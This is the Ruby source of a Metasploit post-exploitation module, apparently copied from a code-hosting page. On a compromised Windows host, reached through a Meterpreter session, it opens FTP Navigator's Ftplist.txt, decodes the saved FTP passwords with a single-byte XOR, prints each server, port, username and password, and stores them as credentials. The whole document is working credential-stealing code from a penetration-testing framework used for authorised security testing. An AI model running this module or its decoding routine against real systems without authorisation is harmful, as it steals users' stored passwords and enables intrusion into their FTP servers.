Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::Windows::Registry
8
  include Msf::Auxiliary::Report
9

10
  def initialize(info = {})
11
    super(
12
      update_info(
13
        info,
14
        'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',
15
        'Description' => %q{
16
          This module extracts saved passwords from the FTP Navigator FTP client.
17
          It will decode the saved passwords and store them in the database.
18
        },
19
        'License' => MSF_LICENSE,
20
        'Author' => ['theLightCosine'],
21
        'Platform' => [ 'win' ],
22
        'SessionTypes' => [ 'meterpreter' ],
23
        'Compat' => {
24
          'Meterpreter' => {
25
            'Commands' => %w[
26
              core_channel_eof
27
              core_channel_open
28
              core_channel_read
29
              core_channel_write
30
            ]
31
          }
32
        }
33
      )
34
    )
35
  end
36

37
  def run
38
    key = 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\FTP Navigator_is1\\'
39
    val_name = 'InstallLocation'
40
    installdir = registry_getvaldata(key, val_name) || 'c:\\FTP Navigator\\'
41

42
    path = "#{installdir}Ftplist.txt"
43

44
    begin
45
      ftplist = client.fs.file.new(path, 'r')
46
    rescue Rex::Post::Meterpreter::RequestError => e
47
      print_error("Unable to open Ftplist.txt: #{e}")
48
      print_error('FTP Navigator May not Ne Installed')
49
      return
50
    end
51

52
    lines = ftplist.read.split("\n")
53
    lines.each do |line|
54
      next if line.include? 'Anonymous=1'
55
      next unless line.include? ';Password='
56

57
      dpass = ''
58
      username = ''
59
      server = ''
60
      port = ''
61

62
      line.split(';').each do |field|
63
        next if field.include? 'SavePassword'
64

65
        if field.include? 'Password='
66
          epass = split_values(field)
67
          dpass = decode_pass(epass)
68
        elsif field.include? 'User='
69
          username = split_values(field)
70
        elsif field.include? 'Server='
71
          server = split_values(field)
72
        elsif field.include? 'Port='
73
          port = split_values(field)
74
        end
75
      end
76

77
      print_good("Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}")
78
      service_data = {
79
        address: Rex::Socket.getaddress(server),
80
        port: port,
81
        protocol: 'tcp',
82
        service_name: 'ftp',
83
        workspace_id: myworkspace_id
84
      }
85

86
      credential_data = {
87
        origin_type: :session,
88
        session_id: session_db_id,
89
        post_reference_name: refname,
90
        username: username,
91
        private_data: dpass,
92
        private_type: :password
93
      }
94

95
      credential_core = create_credential(credential_data.merge(service_data))
96

97
      login_data = {
98
        core: credential_core,
99
        access_level: 'User',
100
        status: Metasploit::Model::Login::Status::UNTRIED
101
      }
102

103
      create_credential_login(login_data.merge(service_data))
104
    end
105
  end
106

107
  def split_values(field)
108
    values = field.split('=', 2)
109
    return values[1]
110
  end
111

112
  def decode_pass(encoded)
113
    decoded = ''
114
    encoded.unpack('C*').each do |achar|
115
      decoded << (achar ^ 0x19)
116
    end
117
    return decoded
118
  end
119
end
120

121